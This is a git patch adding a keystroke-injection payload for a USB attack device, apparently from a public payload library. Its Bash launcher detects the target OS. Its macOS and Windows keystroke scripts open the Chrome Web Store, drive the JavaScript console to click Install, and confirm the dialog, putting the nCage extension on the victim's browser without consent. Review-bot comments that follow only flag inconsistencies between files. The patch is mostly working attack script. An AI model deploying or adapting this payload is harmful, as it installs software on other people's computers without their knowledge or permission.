From 63453543754b9418e97e5ec551e575815013f066 Mon Sep 17 00:00:00 2001 From: Alex Flores Date: Sat, 27 Jan 2018 18:26:53 -0500 Subject: [PATCH] Added chrome extension installer payload (#315) - uses new AUTOETHERNET attackmode - uses new GET TARGET_OS functionality - uses new DEBUG function - uses new MAC_HAPPY extension --- payloads/library/prank/ncage/osx.txt | 55 ++++++++++++++++++++++++ payloads/library/prank/ncage/payload.txt | 44 +++++++++++++++++++ payloads/library/prank/ncage/readme.md | 26 +++++++++++ payloads/library/prank/ncage/win.txt | 35 +++++++++++++++ 4 files changed, 160 insertions(+) create mode 100644 payloads/library/prank/ncage/osx.txt create mode 100644 payloads/library/prank/ncage/payload.txt create mode 100644 payloads/library/prank/ncage/readme.md create mode 100644 payloads/library/prank/ncage/win.txt diff --git a/payloads/library/prank/ncage/osx.txt b/payloads/library/prank/ncage/osx.txt new file mode 100644 index 00000000..e9da9a08 --- /dev/null +++ b/payloads/library/prank/ncage/osx.txt @@ -0,0 +1,55 @@ +REM Title: Chrome Extension Installer +REM Author: audibleblink +DELAY 1000 + +REM Open Extension URL +GUI SPACE +DELAY 500 +STRING chrome +DELAY 500 +ENTER +DELAY 4000 +GUI l +DELAY 200 +STRING https://chrome.google.com/webstore/detail/ncage/hnbmfljfohghaepamnfokgggaejlmfol +DELAY 500 +ENTER + +DELAY 3000 + +REM Open the JavaScript console in the browser +REM GUI-ALT j doesn't work, so we have to do it the long way +CTRL F2 +DELAY 100 +STRING v +DELAY 100 +DOWNARROW +DELAY 100 +STRING d +DELAY 100 +RIGHTARROW +DELAY 100 +STRING j +DELAY 100 +ENTER + +DELAY 3000 + +REM Use jQuery to click the Install button +STRING $("div[role='button']").click() +ENTER + +DELAY 2000 + +REM Confirm the installation +REM Depends on a MacOS setting that allows tabbing through dialogs +SHIFT TAB +DELAY 300 +SPACE + +DELAY 4000 + +REM Close the tabs you just opened +GUI w +DELAY 300 +GUI w 
diff --git a/payloads/library/prank/ncage/payload.txt b/payloads/library/prank/ncage/payload.txt new file mode 100644 index 00000000..7a183600 --- /dev/null +++ b/payloads/library/prank/ncage/payload.txt @@ -0,0 +1,44 @@ +#!/bin/bash + +# ATTENTION: Requires newest firmware with newest extensions + +# Installs the ncage (or any) Google Chrome extension +# using jquery which is kindly supplied by the app store. + +## Status +# | LED | Status | +# | --------- | ----------- | +# | Magenta Solid | Setting up | +# | Blue Blinking | Attacking | +# | Green | Finished | +# | Red | Failed | + +## Setup +LED SETUP +ATTACKMODE AUTO_ETHERNET ETHERNET_TIMEOUT_10 +GET TARGET_OS +GET SWITCH_POSITION + +LED ATTACK + +case "$TARGET_OS" in + + WINDOWS) + ATTACKMODE HID + QUACK ${SWITCH_POSITION}/win.txt + LED FINISH + ;; + + MACOS) + MAC_HAPPY ATTACKMODE HID + QUACK ${SWITCH_POSITION}/osx.txt + LED FINISH + ;; + + *) + DEBUG "ncage" "OS Not Detected" + LED FAIL2 + ;; + +esac + diff --git a/payloads/library/prank/ncage/readme.md b/payloads/library/prank/ncage/readme.md new file mode 100644 index 00000000..4921cb84 --- /dev/null +++ b/payloads/library/prank/ncage/readme.md @@ -0,0 +1,26 @@ + +# nCage + +Author: audibleblink +Version: 2.0 + +## Description + +ATTENTION: Requires newest firmware (1.5+) with newest extensions + +Installs the ncage (or any) Google Chrome extension +using jquery which is kindly supplied by the app store. + +## Configuration +* Configure each ducky.{win,osx} file to your liking + +## Requirements +Just plug and play + +## Status +| LED | Status | +| --------- | ----------- | +| Magenta Solid | Setting up | +| Blue Blinking | Attacking | +| Green | Finished | + diff --git a/payloads/library/prank/ncage/win.txt b/payloads/library/prank/ncage/win.txt new file mode 100644 index 00000000..ac6a4963 --- /dev/null +++ b/payloads/library/prank/ncage/win.txt 
@@ -0,0 +1,35 @@ +REM Title: Chrome Extension Installer +REM Author: audibleblink +DELAY 3000 + +REM Open Extension URL +GUI r +DELAY 600 +STRING chrome https://chrome.google.com/webstore/detail/ncage/hnbmfljfohghaepamnfokgggaejlmfol +DELAY 200 +ENTER + +DELAY 8000 + +REM Open the JavaScript console in the browser +CTRL-SHIFT j + +DELAY 4000 + +REM Use jQuery to click the Install button +STRING $("div[role='button']").click() +ENTER + +DELAY 2000 + +REM Confirm the installation +TAB +DELAY 300 +SPACE + +DELAY 5000 + +REM Close the tabs you just opened +CTRL w +DELAY 300 +CTRL w
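
Review bot: In payloads/library/prank/ncage/osx.txt, the confirmation step is commented `REM Depends on a MacOS setting that allows tabbing through dialogs`, but readme.md in this same patch lists `Just plug and play` under Requirements. The two statements conflict; the dependency should be moved into the readme's Requirements section, naming the setting, so a reader does not have to open the keystroke file to learn of it.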
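
Review bot: In payloads/library/prank/ncage/payload.txt, the fallback branch `*)` ends with `LED FAIL2`, while the status table in the header comment has only one generic row, `Red | Failed`, and does not say which failure state the branch shows. Please make the table describe the state the code actually sets. As a style point, `${SWITCH_POSITION}` is unquoted in both `QUACK` lines; writing `"${SWITCH_POSITION}/win.txt"` and `"${SWITCH_POSITION}/osx.txt"` is the safer shell habit.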
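
Review bot: In payloads/library/prank/ncage/readme.md, the Configuration line points at `ducky.{win,osx}` files, but the files this patch creates are `win.txt` and `osx.txt`, so the instruction names files that do not exist. The Status table here also omits the `Red | Failed` row that the header comment of payload.txt carries, and the firmware note gives `(1.5+)` while payload.txt says only `newest firmware`. Suggest correcting the file names and keeping the status table and firmware requirement identical in both places.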
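
Review bot: In payloads/library/prank/ncage/win.txt, the closing block under `REM Close the tabs you just opened` sends `CTRL w` twice, yet the script opens a single URL through the Run dialog. The comment should say what the second `CTRL w` is meant to close, since as written it can act on a tab or window the script did not open.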